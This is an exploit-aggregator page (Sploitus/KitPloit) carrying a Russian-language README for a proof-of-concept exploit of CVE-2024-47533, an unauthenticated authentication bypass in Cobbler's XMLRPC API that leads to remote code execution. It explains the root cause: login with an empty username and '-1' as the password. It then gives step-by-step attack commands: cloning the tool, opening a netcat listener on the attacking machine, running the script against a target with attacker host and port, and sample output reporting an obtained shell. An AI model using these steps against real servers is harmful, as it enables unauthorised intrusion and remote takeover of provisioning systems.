Sploitus

Exploit for CVE-2024-47533-PoC

kitploit · 2026-08-30

Exploit Code

MARKDOWN122 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-00XCANELO-CVE-2024-47533-POC
# CVE-2024-47533 – Обход аутентификации Cobbler XMLRPC → Обратная оболочка (RCE без аутентификации)

## 📌 Краткое описание

Этот репозиторий содержит **эксплойт Proof-of-Concept (PoC)** для **CVE-2024-47533** ,  
критического обхода аутентификации в XMLRPC API Cobbler, приводящего к **удаленному выполнению кода (RCE) без аутентификации**.

Эксплойт использует уязвимость метода `login()` в XMLRPC API для обхода аутентификации и внедрения команды обратной оболочки через `background_import()`.

* * *

## ⚠️ Отказ от ответственности

Этот инструмент предназначен **только для образовательных, исследовательских целей и авторизованного тестирования на проникновение**.  
**НЕ** используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.  
Автор **не несет ответственности** за неправомерное использование или ущерб.

* * *

## 🛠 Технические детали

  * **Тип уязвимости:** Authentication Bypass → RCE
  * **Затронутый компонент:** Cobbler XMLRPC API
  * **Вектор атаки:** Network
  * **Требуемые привилегии:** None
  * **Взаимодействие пользователя:** None



**Основная причина:**  
`utils.get_shared_secret()` некорректно возвращает `-1` из-за неправильной обработки чтения файла в бинарном режиме с кодировкой, что позволяет аутентификацию с пустым именем пользователя и `-1` в качестве пароля.

**Воздействие:**  
Злоумышленник может:

  * Получить доступ к API на уровне администратора
  * Внедрять произвольные системные команды в шаблоны Cobbler
  * Запустить обратную оболочку на цели



* * *

## 🚀 Использование

### 1️⃣ Клонировать репозиторий

root@kitploit:~
    
    
    git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
    cd CVE-2024-47533-PoC
    

### 2️⃣ Настроить слушатель

На вашей атакующей машине:

root@kitploit:~
    
    
    nc -lvnp 4444
    

### 3️⃣ Запустить эксплойт

root@kitploit:~
    
    
    python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
    

**Пример:**

root@kitploit:~
    
    
    python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
    

* * *

## 📂 Структура файлов

root@kitploit:~
    
    
    .
    ├── CVE-2024-47533.py  # Скрипт эксплойта обратной оболочки
    └── README.md          # Документация
    

* * *

## 📸 Пример вывода

root@kitploit:~
    
    
    [*] Target: http://192.168.1.50:25151/RPC2
    [*] Listener: 192.168.1.100:4444
    [*] Payload: bash
    [*] Connecting to Cobbler...
    [*] Authenticating...
    [*] Executing exploit...
    [+] Exploit sent! Got A Shell 🔥.
    

* * *

## 🧑‍💻 Автор

**00xCanelo**  
Профиль GitHub

* * *

## 📚 Ссылки

  * NVD: CVE-2024-47533
  * Проект Cobbler на GitHub